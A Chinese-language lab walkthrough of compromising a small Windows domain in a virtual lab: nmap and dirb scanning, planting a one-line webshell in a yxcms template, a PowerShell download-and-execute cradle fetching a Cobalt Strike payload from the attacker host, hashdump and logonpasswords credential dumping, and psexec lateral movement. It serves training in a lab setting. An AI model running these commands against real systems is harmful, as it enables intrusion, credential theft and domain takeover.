目录
实验所需:
kali一台,NAT模式。
Win7一台,两张网卡,一张NAT,一张内网。
Win2k3一台,NAT模式。
Win2k8一台,NAT模式。
简单的网络拓扑
确认实验环境
确认实验环境是否可以正常进行实验
Win7:192.168.3.128为内网环境,192.168.40.154则为NAT(外网)环境。
Win2k8
Win2k3
信息收集
通过各种方法搜集到IP,对其进行一个扫描
sudo nmap -A -p- -sC -Pn -T4 192.168.40.154 -oN namp.A
可以看到这个靶机开放了很多端口,很多方法都可以拿下,这里就不在详细赘述。
对其80端口进行一个爆破
dirb http://192.168.40.154
发现yxcms和phpmyadmin
对yxcms进行访问
对网站进行一个浏览
在首页下滑很容易就发现了重要信息
登录网站后台
通过在公告获得的信息得知的后台登录的网址以及账密
上传一句话木马
前台模板----管理模板文件 这里可以编辑php文件,
对404.php页面进行写入一句话木马
保存之后可以使用一句话木马来连接,但不知道网站的绝对路径,我们可以上搜索引擎上看一下。
http://192.168.40.154/yxcms/protected/apps/default/view/default/
蚁剑连接
域渗透
cobaltStrike
sudo ./teamserver 192.168.40.140 123456 ./start.sh
生成监听器
Cobalt Strike ---- Listeners ---add
生成上线指令
Attacks----Web Drive-by----Scripted Web Delivery
Listener一栏选择刚刚创建的监听器。
记录好生成的指令
蚁剑执行
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.140:80/a'))"
执行命令之后稍等一段时间,主机上线。
主机发现
域内主机存活和端口扫描
右键上线的主机----Explore----port scan
注意Listeners选择
view----targets 可以查看结果
域内信息收集
在下方命令行进行
beacon> hashdump beacon> logonpasswords
直接显示明文密码
建立smb隧道
Cobalt Strike----Listeners----add
在targets中 右键IP----Jump----psexec
进行配置
上线成功
同样的方法上线另一台主机
完成。
本文仅供于学习探讨